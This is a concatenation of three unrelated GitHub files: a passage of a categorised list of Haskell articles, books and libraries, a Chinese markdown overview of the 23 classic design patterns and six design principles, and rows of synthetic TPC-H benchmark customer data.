Microservice](https://twonki.github.io/haskell-microservice/) * [Competitive programming in Haskell: building unordered trees](https://byorgey.wordpress.com/2020/05/22/competitive-programming-in-haskell-building-unordered-trees/) * [Maxfield Chen - Dynamically Flunking the Coding Interview](https://maxfieldchen.com/posts/2020-05-23-Dynamically-Flunking-Code-Interview-Haskell.html) * [Oleg's gists - Evolving non-determinism](https://oleg.fi/gists/posts/2020-05-26-evolving-non-determinism.html) * [Generalizing Our Environments](https://mmhaskell.com/blog/2020/5/11/generalizing-our-environments) * [Setting up a Haskell development environment with Nix](https://romainviallard.dev/en/blog/setting-up-a-haskell-development-environment-with-nix/) * [Deploying your application with NixOS](https://romainviallard.dev/en/blog/deploying-your-app-with-nixos/) * [YourFirstGame with Haskell, Godot, and godot-haskell](https://spartanengineer.com/posts/2020-05-24-yourfirstgame-with-haskell-and-godot.html) * [Simply typed lambda calculus](https://splintah.gitlab.io/posts/2020-05-24-Simply-typed-lambda.html) * [Subgame perfection made difficult](https://julesh.com/2020/05/26/subgame-perfection-made-difficult/) * [Update Everything](https://funwithfunctions.com/posts/2020-05-24-update-everything.html) * [Making Music with Haskell From Scratch](https://www.youtube.com/watch?feature=youtu.be&v=FYTZkE5BZ-0) * [Adventures in Refactoring](https://samtay.github.io/posts/refactoring-adventures) * [Building a reactive calculator in Haskell (1/5)](https://keera.co.uk/2020/05/28/building-a-reactive-calculator-in-haskell-1-5/) * [Building a reactive calculator in Haskell (2/5)](https://keera.co.uk/2020/05/30/building-a-reactive-calculator-in-haskell-2-5/) * [Building a reactive calculator in Haskell (3/5)](https://keera.co.uk/2020/06/02/building-a-reactive-calculator-in-haskell-3-5/) * [Building a reactive calculator in Haskell (4/5) – Keera Studios](https://keera.co.uk/2020/06/09/building-a-reactive-calculator-in-haskell-4-5/) * [Building a reactive calculator in Haskell (5/5) – Keera Studios](https://keera.co.uk/2020/06/16/building-a-reactive-calculator-in-haskell-5-5/) * [Generating documentation from API types](https://holmusk.dev/blog/2020-05-18-Generating-documentation-from-API-types.html) * [Quick Memory Trick](https://www.parsonsmatt.org/2020/06/01/quick_memory_trick.html) * [Reanimate: a tutorial on making programmatic animations](https://williamyaoh.com/posts/2020-05-31-reanimate-nqueens-tutorial.html) * [The abstract nature of the Cardano consensus layer](https://iohk.io/en/blog/posts/2020/05/28/the-abstract-nature-of-the-consensus-layer/) * [CircleCI and Haskell](https://dev.to/codenoodle/circleci-and-haskell-46g6) * [Cleaning up threads in Haskell](https://chrismwendt.github.io/blog/2020/05/31/cleaning-up-threads-in-haskell.html) * [CodeWorld as a Haskell Playground: Call for Package Requests](https://medium.com/@cdsmithus/codeworld-as-a-haskell-playground-call-for-package-requests-3b9ae3bcd840) * [Competitive programming in Haskell: permutations](https://byorgey.wordpress.com/2020/05/30/competitive-programming-in-haskell-permutations/) * [Function Domain](https://dev.to/samhh/function-domain-33fb) * [RecordDotSyntax in Haskell](https://dev.to/riccardoodone/recorddotsyntax-in-haskell-2jgl) * [Refactored Game Play!](https://mmhaskell.com/blog/2020/5/18/refactored-gameplay) * [A short exploration of GHC’s instance resolution hiding mistakes from the type checker](https://dorchard.blog/2020/06/03/a-short-exploration-of-ghcs-instance-resolution-hiding-mistakes-from-the-type-checker/) * [Simulated annealing](https://oleg.fi/gists/posts/2020-06-02-simulated-annealing.html) * [Colin Woodbury](https://www.fosskers.ca/en/blog/tolist) * [Haskell at Symbiont: Flexible Tests Selection](https://www.symbiont.io/post/haskell-at-symbiont-flexible-tests-selection) * [Neil Mitchell's Haskell Blog: Hoogle Searching Overview](https://neilmitchell.blogspot.com/2020/06/hoogle-searching-overview.html) * [Lorentz: Introducing Complex Objects to Michelson](https://serokell.io/blog/lorentz-complex-objects) * [Q-Learning with Tensors — Monday Morning Haskell](https://mmhaskell.com/blog/2020/6/8/q-learning-with-tensors) * [Using client-side Haskell web frameworks in CodeWorld](https://medium.com/@cdsmithus/using-client-side-haskell-web-frameworks-in-codeworld-7d8661647191) * [Simple Linear Regression in One Pass - DanielBrice.net](https://www.danielbrice.net/blog/simple-linear-regression-in-one-pass/) * [Solving Algorithm Challenges in Haskell: Anagrams - DEV](https://dev.to/theodesp/solving-algorithm-challenges-in-haskell-anagrams-15jd) * [Training our Agent with Haskell! — Monday Morning Haskell](https://mmhaskell.com/blog/2020/6/15/training-our-agent-with-haskell) * [Comparing the same web scraper in Haskell, Python, Go - DEV](https://dev.to/yujiri8/comparing-the-same-web-scraper-in-haskell-python-go-387a) * [Document generation & Rendered Source Code - DEV](https://dev.to/german1608/document-generation-rendered-source-code-10cb) * [Query-based compiler architectures | Olle Fredriksson's blog](https://ollef.github.io/blog/posts/query-based-compilers.html) * [Tweag - Splittable pseudo-random number generators in Haskell: random v1.1 and v1.2](https://www.tweag.io/blog/2020-06-29-prng-test/) * [Competitive programming in Haskell: data representation and optimization, with cake | blog :: Brent -> String](https://byorgey.wordpress.com/2020/06/29/competitive-programming-in-haskell-data-representation-and-optimization-with-cake/) # API * [Programming totally with head and tail](https://blog.poisson.chat/posts/2020-04-13-safe-head-tail.html) * [A Type-Safe Approach to Categorized Data](https://epeery.com/typesafe-approach-to-categorized-data/) * [Error Messages in Haskell, and how to Improve them](https://anthony.noided.media/blog/haskell/programming/2020/05/14/haskell-errors.html) * [Haskell - Data.Array.Log256 (SAFE, idiomatic and ⊥)](http://blog.stermon.com/articles/2020/05/22/haskell-data-array-log256-safe-idiomatic-and-bottom.html) * [bracketing and async exceptions in haskell](https://joeyh.name/blog/entry/bracketing_and_async_exceptions_in_haskell/) * do [The doomsday machine](https://tech.fretlink.com/the-doomsday-machine/) * exception * [THE THREE KINDS OF HASKELL EXCEPTIONS AND HOW TO USE THEM](https://www.tweag.io/posts/2020-04-16-exceptions-in-haskell.html) * IO [The power of IO in Haskell | 47 Degrees](https://www.47deg.com/blog/io-haskell/) * String [Eat Haskell String Types for Breakfast](https://free.cofree.io/2020/05/06/string-types/) # Book * [gumroad.com/discover?query=haskell](https://gumroad.com/discover?query=haskell) * [Haskell Snippets - 하스켈 조각 코드 모음집](https://wikidocs.net/book/820) * [learnyouahaskell.com](http://learnyouahaskell.com/) * [Happy Learn Haskell Tutorial](http://www.happylearnhaskelltutorial.com/contents.html) * [Haskell from the Very Beginning](https://www.haskellfromtheverybeginning.com) * [Haskell Programming](http://haskellbook.com/) * [Real World Haskell by Bryan O'Sullivan, Don Stewart, and John Goerzen](http://book.realworldhaskell.org/) * [I'm trying to update the Real World Haskell book](https://github.com/tssm/up-to-date-real-world-haskell) * [up-to-date-real-world-haskell: I'm trying to update the Real World Haskell book](https://github.com/tssm/up-to-date-real-world-haskell) * [To Kata Haskellen Evangelion](https://cosmius.bitbucket.io/tkhe/) * [WikibooksHaskell](https://wikidocs.net/book/204) # Conference * [LambdaConf 2015 - How to Learn Haskell in Less Than 5 Years Chris Allen](https://www.youtube.com/watch?v=Bg9ccYzMbxc) * [LambdaConf 2015 - Modeling Data in Haskell for Beginners Chris Allen](https://www.youtube.com/watch?v=p-NBJm0kIYU) * [LambdaConf 2015 - Developing Web Applications with Haskell Alejandro Serrano Mena](https://www.youtube.com/watch?v=FnaD4xS_hHY) * [ZuriHac 2020](https://zfoh.ch/zurihac2020/) * [ZuriHac 2020 - YouTube](https://www.youtube.com/playlist?list=PLiU7KJ5_df6aZbNfh_TUJt-6w9N3rYkTX) # Library * [Haskell with UTF-8](https://serokell.io/blog/haskell-with-utf8) * [Tools for working on GHC](https://mpickering.github.io/posts/2019-06-11-ghc-tools.html) * [Choosing an HTML library in Haskell](https://vrom911.github.io/blog/html-libraries) * [Implementing HTTP/3 in Haskell - あどけない話](https://kazu-yamamoto.hatenablog.jp/entry/2020/06/09/155236) * [Awake Security](https://github.com/awakesecurity) * [azure-demo - Haskell + Azure DevOps Demo](https://github.com/alasconnect/azure-demo/) * Cabal * [The Pain Points of Haskell: A Practical Summary](https://dixonary.co.uk/blog/haskell/pain) * [Caramel is a set of bidirectional, Haskell-inspired syntax-sugars that are expanded to, and contracted from, λ-Calculus terms](https://github.com/MaiaVictor/caramel) * [Cloud Haskell: Erlang-style concurrent and distributed programming in Haskell](http://haskell-distributed.github.io/) * [compleat - Generate command-line completions using a simple DSL. http://limpet.net/mbrubeck/2009/10/30/compleat.html](https://github.com/mbrubeck/compleat) * [A DSL for deep neural networks, supporting Caffe and Torch http://ajtulloch.github.io/dnngraph](https://github.com/ajtulloch/dnngraph) * [coreutils: Unix core utilities implemented in Haskell](https://github.com/Gandalf-/coreutils) * [coreutils/Split.hs at master · Gandalf-/coreutils](https://github.com/Gandalf-/coreutils/blob/master/Coreutils/Split.hs) * [Anardil — Haskell coreutils - split](https://anardil.net/2020/haskell-coreutils-split.html) * [dcfl is a parallelized constraint solving library for Haskell](http://poincare.github.io/DCFL/) * [fakedata - Haskell Library for producing quality fake data](https://github.com/psibi/fakedata/tree/d08b7b9ff41f3f91e3376ec573cf58f7a95c30b2) * [Frag - a 3D first person shooting game written in Haskell](https://wiki.haskell.org/Frag) * [Frege - a Haskell for the JVM](https://github.com/Frege/frege) * [Frege, a Haskell for the JVM by Dierk König](https://www.youtube.com/watch?v=1P1-HXNfFPc) * [Froskell - Haskell with unlockable features for teaching programming](https://secure.plaimi.net/papers/2015-01-16-froskell-programming-language.html) * [ghc-ios-scripts - Scripts for building GHC and Haskell programs for iOS](https://github.com/ghc-ios/ghc-ios-scripts) * [Gitpod Haskell - Gitpod Support for haskell](https://github.com/JesterOrNot/Gitpod-Haskell) * [h4sh - Fork of Don Stewarts h4sh haskell shell scripts http://www.cse.unsw.edu.au/~dons/h4sh.html](https://github.com/cpennington/h4sh) * [Hakyll - a Haskell library for generating static sites, mostly aimed at small-to-medium sites and personal blogs](https://jaspervdj.be/hakyll/) * [Hakyll Pt. 1 – Setup & Initial Customization](https://robertwpearce.com/hakyll-pt-1-setup-and-initial-customization.html) * [Hakyll Pt. 2 – Generating a Sitemap XML File](https://robertwpearce.com/hakyll-pt-2-generating-a-sitemap-xml-file.html) * [Hakyll Pt. 3 – Generating RSS and Atom XML Feeds](https://robertwpearce.com/hakyll-pt-3-generating-rss-and-atom-xml-feeds.html) * [Hakyll Pt. 4 – Copying Static Files For Your Build](https://robertwpearce.com/hakyll-pt-4-copying-static-files-for-your-build.html) * [Hakyll Pt. 5 – Generating Custom Post Filenames From a Title Slug](https://robertwpearce.com/hakyll-pt-5-generating-custom-post-filenames-from-a-title-slug.html) * [Hakyll Pt. 6 – Pure Builds With Nix](https://robertwpearce.com/hakyll-pt-6-pure-builds-with-nix.html) * [Haskell for Mac is an easy-to-use integrated programming environment for the functional programming language Haskell](http://haskellformac.com/) * [haskell-language-server - Integration point for ghcide and haskell-ide-engine. One IDE to rule them all](https://github.com/haskell/haskell-language-server) * [Neil Mitchell's Haskell Blog: Fixing Space Leaks in Ghcide](https://neilmitchell.blogspot.com/2020/05/fixing-space-leaks-in-ghcide.html) * [HaskellR - Programming R in Haskell](https://tweag.github.io/HaskellR/) * [Programming R at native speed using Haskell](http://www.tweag.io/blog/programming-r-at-native-speed-using-haskell) * [HaNS - The haskell network stack](https://github.com/GaloisInc/HaNS) * [Hasura - A Batteries-included App Development Platform](http://hasura.io/) * [Haxl - A Haskell library that simplifies access to remote data, such as databases or web-based services](https://github.com/facebook/Haxl) * [하스켈학교 세미나 - Haxl](https://www.slideshare.net/jooyunghan/haxl-63764110) * [GC처럼 동시성 문제를?](https://medium.com/@jooyunghan/gc%EC%B2%98%EB%9F%BC-%EB%8F%99%EC%8B%9C%EC%84%B1-%EB%AC%B8%EC%A0%9C%EB%A5%BC-7ab792636c0c) * [HiDb: A Haskell In-Memory Relational Database](http://www.scs.stanford.edu/14sp-cs240h/projects/puttagunta_debray_tu.pdf) * [HLint 3.0 uses the GHC parser](https://neilmitchell.blogspot.com/2020/05/hlint-30.html) * [HLint --cross was accidentally quadratic](https://neilmitchell.blogspot.com/2020/05/hlint-cross-was-accidentally-quadratic.html) * [Idris-Java - Idris Java Backend - This is an updated version of the Java backend for Idris](https://github.com/idris-hackers/idris-java) * [inline-java - Calling to the JVM from Haskell: Some benchmarks](https://www.tweag.io/blog/2020-06-11-inline-java-benchmarks/) * [it-has - A Generic implementation of data-has](https://github.com/dnikolovv/it-has) * [knit ties the knot on data structures that reference each other by unique keys](https://github.com/pkamenarsky/knit) * [Leksah - the Haskell IDE of choice](http://leksah.org/) * [Mu-Haskell - a set of packages that help you build both servers and clients for (micro)services](https://higherkindness.io/mu-haskell/) gRPC * [Introducing Mu-Haskell v0.1](https://www.47deg.com/blog/introducing-mu-haskell-0-1/) * nix * [SF Scala: Enhancing Spark's Power with ZIO, Qubism and NLP at Scale, Using Nix for Haskell](https://www.youtube.com/watch?v=Ov7WZroBkv0) * [Building a reproducible blog with Nix](https://blog.ysndr.de/posts/internals/2020-04-10-built-with-nix/) * nixpkgs [IDE 2020: Getting ghcide into nixpkgs](https://mpickering.github.io/ide/posts/2020-06-05-ghcide-and-nixpkgs.html) * OptParse * [Option parsing in Haskell, Part 2: A standard approach to settings in Haskell](https://cs-syd.eu/posts/2020-05-14-option-parsing-2) * [overloaded: Overloaded pragmas as a plugin](https://hackage.haskell.org/package/overloaded-0.2.1) * [overloaded-0.2.1: Overloaded:Categories](https://oleg.fi/gists/posts/2020-05-04-overloaded-categories.html) * [overloaded-0.2.1: Overloaded:Do](https://oleg.fi/gists/posts/2020-04-27-overloaded-local-do.html) * [overloaded-0.2.1: Overloaded:Unit](https://oleg.fi/gists/posts/2020-05-11-overloaded-unit.html) * [Bitonic sort: an example of Overloaded:Categories and Staged programming](https://oleg.fi/gists/posts/2020-05-19-bitonic-sort.html) * Pandoc [Custom Markdown in Pandoc](https://dev.to/riccardoodone/custom-markdown-in-pandoc-43hf) * Parsec * [Parsing the untyped λ-calculus with Parsec](http://mattwetmore.me/posts/parsing-combinators-with-parser-combinators.html) * [password - provides packages for easily working with passwords in Haskell](https://github.com/cdepillabout/password) * [polysemy: Higher-order, low-boilerplate, zero-cost free monads](https://hackage.haskell.org/package/polysemy) * [Polysemy - Part I - Introduction](https://sir4ur0n.github.io/posts/intro-polysemy.html) * [Polysemy - Part II - First example](https://sir4ur0n.github.io/posts/polysemy-first-example.html) * [Polysemy - Part III - Tests](https://sir4ur0n.github.io/posts/polysemy-tests.html) * [Writing a discord library using Polysemy](https://nitros12.github.io/writing-a-discord-library-using-polysemy/) * [Reanimate](https://reanimate.readthedocs.io/) * [rei - Process lists easily with](https://github.com/kerkomen/rei) * [Servant - Webservice API combinators](http://haskell-servant.github.io/) * [A Servant API Testing Example From the Wild](https://vadosware.io/post/a-servant-api-testing-example-from-the-wild/) * [servant-forma This package provides a servant combinator to validate your Forma based forms before they reach your handlers](https://github.com/aveltras/servant-forma/) * [Shake 0.19 - changes to process execution](https://neilmitchell.blogspot.com/2020/05/shake-019-changes-to-process-execution.html) * [singlethongs: Like singletons, but much smaller](https://hackage.haskell.org/package/singlethongs-0.1) * [SIXEL Library for Haskell](https://github.com/junjihashimoto/sixel) * [souffle-haskell - Haskell bindings for the Souffle datalog language](https://github.com/luc-tielen/souffle-haskell/) * [Spock - SIMPLE. EXPRESSIVE. FAST. Kickstart your next Haskell web application within seconds using Spock](http://www.spock.li/) * [stack - a new, complete, cross-platform development tool aimed at both new and experienced Haskell developers](https://www.fpcomplete.com/blog/2015/06/announcing-first-public-beta-stack) * [stack 0.1 released](https://www.fpcomplete.com/blog/2015/06/stack-0-1-release) * [Why is stack not cabal?](https://www.fpcomplete.com/blog/2015/06/why-is-stack-not-cabal) * [turtle embeds shell scripting directly within Haskell](http://hackage.haskell.org/package/turtle-1.0.0/docs/Turtle-Tutorial.html) * [Twilio IVR - A fluent Twilio IVR library for Haskell](https://github.com/steven777400/TwilioIVR/) * wai * [Your First Haskell Web App With WAI And Warp by Michael Snoyman #FnConf19 - YouTube](https://www.youtube.com/watch?v=mz5_HmLGRXc) * [Yesod Web Framework](https://github.com/yesodweb) * [Basics of Yesod](https://www.schoolofhaskell.com/school/starting-with-haskell/libraries-and-frameworks/basics-of-yesod) * [Yi - Text editor written in Haskell](http://yi-editor.github.io/) # Monad * ["Build Your Own Probability Monads" paper, blog posts and source code](http://www.randomhacks.net/probability-monads/) * [Free and Freer Monads: Putting Monads Back into Closet](http://okmij.org/ftp/Computation/free-monad.html) * [Haskell Monads in 8 Minutes](https://www.youtube.com/watch?v=gEoruozy3mk) * [In Haskell, what does the phrase "monadic bind" mean?](https://www.quora.com/In-Haskell-what-does-the-phrase-monadic-bind-mean) * [Indexed Monads: Examples and Discussion](https://wespiser.com/posts/2020-05-06-IxMonad.html) * [A guide to monads in Haskell](https://medium.com/swlh/a-guide-to-monads-in-haskell-fe1c0e4457c1) * [Hierarchical Free Monads: The Most Developed Approach In Haskell](https://github.com/graninas/hierarchical-free-monads-the-most-developed-approach-in-haskell/blob/7472b5c1a073366d87153dd3976873687422c8b1/README.md) * [Hierarchical Free Monads: Mostly Pointless](https://github.com/effectfully/sketches/tree/42166f6f13a87f749fd30f938a6c0f3600385f35/hierarchical-free-monads-mostly-pointless#readme) * [Understand IO Monad and implement it yourself in Haskell](https://boxbase.org/entries/2020/may/18/diy-io-monad/) # TDD, Test * [Rewriting to Haskell–Testing](https://odone.io/posts/2020-04-13-rewriting-haskell-testing.html) * [Servant Testing Helpers!](https://mmhaskell.com/blog/2020/3/30/servant-testing-helpers) * [Property testing in depth: genvalidity's fixed-size type generators](https://cs-syd.eu/posts/2020-04-28-genvalidity-improvements) # Test * [Porting the Pusher integration tests to Haskell](https://blog.pusher.com/porting-the-pusher-integration-tests-to-haskell/) * [TESTABLE IO IN HASKELL](http://engineering.imvu.com/2015/06/20/testable-io-in-haskell-2/) * [HASKELL: UNEXPECTEDLY MAKING IT HARDER TO UNIT TEST](https://atilanevesoncode.wordpress.com/2015/09/14/haskell-unexpectedly-making-it-harder-to-unit-test/) * [Unit testing IO in Haskell](https://blog.pusher.com/unit-testing-io-in-haskell/) * [Hedgehog - a modern property-based testing system](https://github.com/hedgehogqa/haskell-hedgehog) * [Time Travelling and Fixing Bugs with Property-Based Testing](https://wickstrom.tech/programming/2019/11/17/time-travelling-and-fixing-bugs-with-property-based-testing.html) * [QuickCheck - a combinator library originally written in Haskell](https://en.wikipedia.org/wiki/QuickCheck) # Type * [Announcing the refinement types library](http://nikita-volkov.github.io/refined/) * [Map of numeric types in Haskell](http://engineering.sumall.com/map-of-numeric-types-in-haskell/) * [Dependently typed programming and theorem proving in Haskell](https://jeltsch.wordpress.com/2012/04/30/dependently-typed-programming-and-theorem-proving-in-haskell/) * [Zippers And Type Magic](https://keb.theoremsfor.me/zippers-and-type-magic/) * [Haskell's Type Classes: We Can Do Better](http://degoes.net/articles/principled-typeclasses/) * [Type Families and Pokemon](https://www.schoolofhaskell.com/school/to-infinity-and-beyond/pick-of-the-week/type-families-and-pokemon) * [thinking-with-types - source material for Thinking with Types http://thinkingwithtypes.com ](https://github.com/isovector/thinking-with-types) * [solutions.pdf](https://github.com/isovector/thinking-with-types/blob/master/solutions.pdf) * [Typed type-level programming in Haskell, part I: functional dependencies](https://byorgey.wordpress.com/2010/06/29/typed-type-level-programming-in-haskell-part-i-functional-dependencies) * [Typed type-level programming in Haskell, part II: type families](https://byorgey.wordpress.com/2010/07/06/typed-type-level-programming-in-haskell-part-ii-type-families/) * [Typed type-level programming in Haskell, part III: I can haz typs plz?](https://byorgey.wordpress.com/2010/07/19/typed-type-level-programming-in-haskell-part-iii-i-can-haz-typs-plz/) * [MultiParam Typeclasses](http://dev.stephendiehl.com/hask/#multiparam-typeclasses) functional dependencies * [MultiParam Typeclasses](https://gist.github.com/nattybear/7fd19deb2097e3d7fe73088b1b6970f4) * [Parallel typeclass for Haskell](https://gvolpe.github.io/blog/parallel-typeclass-for-haskell/) * [Types vs. datatypes vs. typeclasses in Haskell](https://jesseevers.com/haskell-types/) * [Basic Type Level Programming in Haskell](https://www.parsonsmatt.org/2017/04/26/basic_type_level_programming_in_haskell.html) * [Haskell’s Type Families](https://web.facebook.com/notes/%ED%95%98%EC%8A%A4%EC%BC%88-%ED%95%99%EA%B5%90/haskells-type-families/2645916715429823/) * [Typeable — A long journey to type-safe dynamic type representation (Part 1)](https://medium.com/@hgiasac/typeable-a-long-journey-to-type-safe-dynamic-type-representation-9070eac2cf8b) * [Typeable — A long journey to type-safe dynamic type representation (Part 2)](https://medium.com/@hgiasac/typeable-a-long-journey-to-type-safe-dynamic-type-representation-part-2-954b52bfa9fa) * [Typeable — A long journey to type-safe dynamic type representation (Part 3)](https://medium.com/@hgiasac/typeable-a-long-journey-to-type-safe-dynamic-type-representation-part-3-80a2a34329dd) * [Trade-Offs in Type Safety](https://alpacaaa.net/type-safety/) * [Type inference - Splinter Suidman](https://splintah.gitlab.io/posts/2020-06-14-Type-inference.html) # Tutorial * [INTRODUCTION TO FUNCTIONAL PROGRAMMING USING HASKELL](https://1ambda.github.io/haskell/) 한글 * [CIS 194: Introduction to Haskell (Spring 2013)](https://www.seas.upenn.edu/~cis194/spring13/) * [enshahar.com](http://enshahar.com/) 한글 * [Haskell for impatient Scala developer: Getting into speed](https://msitko.pl/blog/2020/02/08/haskell-getting-into-speed.html) * [**진보하는 함수형 언어, Haskell (김재우)**](https://www.notion.so/Haskell-84c22c4bb40a46438dc6757424827fca) * [Why Haskell Matters](https://github.com/thma/WhyHaskellMatters) * [THINGS SOFTWARE ENGINEERS TRIP UP ON WHEN LEARNING HASKELL](https://williamyaoh.com/posts/2020-04-12-software-engineer-hangups.html) * [10 Reasons to Use Haskell](https://serokell.io/blog/10-reasons-to-use-haskell) * [Learning Haskell: Getting Started](https://levelup.gitconnected.com/learning-haskell-getting-started-9f34155456e) * [Learning Haskell: Getting Setup](https://levelup.gitconnected.com/learning-haskell-getting-setup-c1f2cc69d915) * [Getting Started with Haskell on Fedora - Fedora Magazine](https://fedoramagazine.org/getting-started-with-haskell-on-fedora/) * [FizzBuzz - You Suck at Coding 0 - YouTube](https://www.youtube.com/watch?v=mZWsyUKwTbg)
{ "pile_set_name": "Github" }
## 设计模式 > 设计模式(Design pattern)代表了最佳的实践,通常被有经验的面向对象的软件开发人员所采用。设计模式是软件开发人员在软件开发过程中面临的一般问题的解决方案。这些解决方案是众多软件开发人员经过相当长的一段时间的试验和错误总结出来的。 设计模式是一套被反复使用的、多数人知晓的、经过分类编目的、代码设计经验的总结。使用设计模式是为了重用代码、让代码更容易被他人理解、保证代码可靠性。 毫无疑问,设计模式于己于他人于系统都是多赢的,设计模式使代码编制真正工程化,设计模式是软件工程的基石,如同大厦的一块块砖石一样。项目中合理地运用设计模式可以完美地解决很多问题,每种模式在现实中都有相应的原理来与之对应,每种模式都描述了一个在我们周围不断重复发生的问题,以及该问题的核心解决方案,这也是设计模式能被广泛应用的原因 ### 设计模式的类型 根据设计模式的参考书 **Design Patterns - Elements of Reusable Object-Oriented Software(中文译名:设计模式 - 可复用的面向对象软件元素)** 中所提到的,总共有 23 种设计模式。这些模式可以分为三大类:创建型模式(Creational Patterns)、结构型模式(Structural Patterns)、行为型模式(Behavioral Patterns) | 序号 | 模式 & 描述 | 包括 | | ---- | ------------------------------------------------------------ | ------------------------------------------------------------ | | 1 | **创建型模式** 这些设计模式提供了一种在创建对象的同时隐藏创建逻辑的方式,而不是使用 new 运算符直接实例化对象。这使得程序在判断针对某个给定实例需要创建哪些对象时更加灵活。 | 工厂模式(Factory Pattern)抽象工厂模式(Abstract Factory Pattern)单例模式(Singleton Pattern)建造者模式(Builder Pattern)原型模式(Prototype Pattern) | | 2 | **结构型模式** 这些设计模式关注类和对象的组合。继承的概念被用来组合接口和定义组合对象获得新功能的方式。 | 适配器模式(Adapter Pattern)桥接模式(Bridge Pattern)过滤器模式(Filter、Criteria Pattern)组合模式(Composite Pattern)装饰器模式(Decorator Pattern)外观模式(Facade Pattern)享元模式(Flyweight Pattern)代理模式(Proxy Pattern) | | 3 | **行为型模式** 这些设计模式特别关注对象之间的通信。 | 责任链模式(Chain of Responsibility Pattern)命令模式(Command Pattern)解释器模式(Interpreter Pattern)迭代器模式(Iterator Pattern)中介者模式(Mediator Pattern)备忘录模式(Memento Pattern)观察者模式(Observer Pattern)状态模式(State Pattern)空对象模式(Null Object Pattern)策略模式(Strategy Pattern)模板模式(Template Pattern)访问者模式(Visitor Pattern) | ### 设计模式的六大原则 **1、开闭原则(Open Close Principle)** 开闭原则的意思是:**对扩展开放,对修改关闭**。在程序需要进行拓展的时候,不能去修改原有的代码,实现一个热插拔的效果。简言之,是为了使程序的扩展性好,易于维护和升级。想要达到这样的效果,我们需要使用接口和抽象类, > 实现热插拔,提高扩展性。 **2、里氏代换原则(Liskov Substitution Principle)** 里氏代换原则是面向对象设计的基本原则之一。 里氏代换原则中说,任何基类可以出现的地方,子类一定可以出现。LSP 是继承复用的基石,只有当派生类可以替换掉基类,且软件单位的功能不受到影响时,基类才能真正被复用,而派生类也能够在基类的基础上增加新的行为。里氏代换原则是对开闭原则的补充。实现开闭原则的关键步骤就是抽象化,而基类与子类的继承关系就是抽象化的具体实现,所以里氏代换原则是对实现抽象化的具体步骤的规范。 > 实现抽象的规范,实现子父类互相替换; **3、依赖倒转原则(Dependence Inversion Principle)** 这个原则是开闭原则的基础,具体内容:针对接口编程,依赖于抽象而不依赖于具体。 > 针对接口编程,实现开闭原则的基础; **4、接口隔离原则(Interface Segregation Principle)** 这个原则的意思是:使用多个隔离的接口,比使用单个接口要好。它还有另外一个意思是:降低类之间的耦合度。由此可见,其实设计模式就是从大型软件架构出发、便于升级和维护的软件设计思想,它强调降低依赖,降低耦合。 > 降低耦合度,接口单独设计,互相隔离; **5、迪米特法则,又称最少知道原则(Demeter Principle)** 最少知道原则是指:一个实体应当尽量少地与其他实体之间发生相互作用,使得系统功能模块相对独立。 > 功能模块尽量独立 **6、合成复用原则(Composite Reuse Principle)** 合成复用原则是指:尽量使用合成/聚合的方式,而不是使用继承。 > 尽量使用聚合,组合,而不是继承;
{ "pile_set_name": "Github" }
1|Customer#000000001|IVhzIApeRb ot,c,E|15|25-989-741-2988|711.56|BUILDING|to the even, regular platelets. regular, ironic epitaphs nag e 2|Customer#000000002|XSTf4,NCwDVaWNe6tEgvwfmRchLXak|13|23-768-687-3665|121.65|AUTOMOBILE|l accounts. blithely ironic theodolites integrate boldly: caref 3|Customer#000000003|MG9kdTD2WBHm|1|11-719-748-3364|7498.12|AUTOMOBILE| deposits eat slyly ironic, even instructions. express foxes detect slyly. blithely even accounts abov 4|Customer#000000004|XxVSJsLAGtn|4|14-128-190-5944|2866.83|MACHINERY| requests. final, regular ideas sleep final accou 5|Customer#000000005|KvpyuHCplrB84WgAiGV6sYpZq7Tj|3|13-750-942-6364|794.47|HOUSEHOLD|n accounts will have to unwind. foxes cajole accor 6|Customer#000000006|sKZz0CsnMD7mp4Xd0YrBvx,LREYKUWAh yVn|20|30-114-968-4951|7638.57|AUTOMOBILE|tions. even deposits boost according to the slyly bold packages. final accounts cajole requests. furious 7|Customer#000000007|TcGe5gaZNgVePxU5kRrvXBfkasDTea|18|28-190-982-9759|9561.95|AUTOMOBILE|ainst the ironic, express theodolites. express, even pinto beans among the exp 8|Customer#000000008|I0B10bB0AymmC, 0PrRYBCP1yGJ8xcBPmWhl5|17|27-147-574-9335|6819.74|BUILDING|among the slyly regular theodolites kindle blithely courts. carefully even theodolites haggle slyly along the ide 9|Customer#000000009|xKiAFTjUsCuxfeleNqefumTrjS|8|18-338-906-3675|8324.07|FURNITURE|r theodolites according to the requests wake thinly excuses: pending requests haggle furiousl 10|Customer#000000010|6LrEaV6KR6PLVcgl2ArL Q3rqzLzcT1 v2|5|15-741-346-9870|2753.54|HOUSEHOLD|es regular deposits haggle. fur 11|Customer#000000011|PkWS 3HlXqwTuzrKg633BEi|23|33-464-151-3439|-272.60|BUILDING|ckages. requests sleep slyly. quickly even pinto beans promise above the slyly regular pinto beans. 12|Customer#000000012|9PWKuhzT4Zr1Q|13|23-791-276-1263|3396.49|HOUSEHOLD| to the carefully final braids. blithely regular requests nag. ironic theodolites boost quickly along 13|Customer#000000013|nsXQu0oVjD7PM659uC3SRSp|3|13-761-547-5974|3857.34|BUILDING|ounts sleep carefully after the close frays. carefully bold notornis use ironic requests. blithely 14|Customer#000000014|KXkletMlL2JQEA |1|11-845-129-3851|5266.30|FURNITURE|, ironic packages across the unus 15|Customer#000000015|YtWggXoOLdwdo7b0y,BZaGUQMLJMX1Y,EC,6Dn|23|33-687-542-7601|2788.52|HOUSEHOLD| platelets. regular deposits detect asymptotes. blithely unusual packages nag slyly at the fluf 16|Customer#000000016|cYiaeMLZSMAOQ2 d0W,|10|20-781-609-3107|4681.03|FURNITURE|kly silent courts. thinly regular theodolites sleep fluffily after 17|Customer#000000017|izrh 6jdqtp2eqdtbkswDD8SG4SzXruMfIXyR7|2|12-970-682-3487|6.34|AUTOMOBILE|packages wake! blithely even pint 18|Customer#000000018|3txGO AiuFux3zT0Z9NYaFRnZt|6|16-155-215-1315|5494.43|BUILDING|s sleep. carefully even instructions nag furiously alongside of t 19|Customer#000000019|uc,3bHIx84H,wdrmLOjVsiqXCq2tr|18|28-396-526-5053|8914.71|HOUSEHOLD| nag. furiously careful packages are slyly at the accounts. furiously regular in 20|Customer#000000020|JrPk8Pqplj4Ne|22|32-957-234-8742|7603.40|FURNITURE|g alongside of the special excuses-- fluffily enticing packages wake 21|Customer#000000021|XYmVpr9yAHDEn|8|18-902-614-8344|1428.25|MACHINERY| quickly final accounts integrate blithely furiously u 22|Customer#000000022|QI6p41,FNs5k7RZoCCVPUTkUdYpB|3|13-806-545-9701|591.98|MACHINERY|s nod furiously above the furiously ironic ideas. 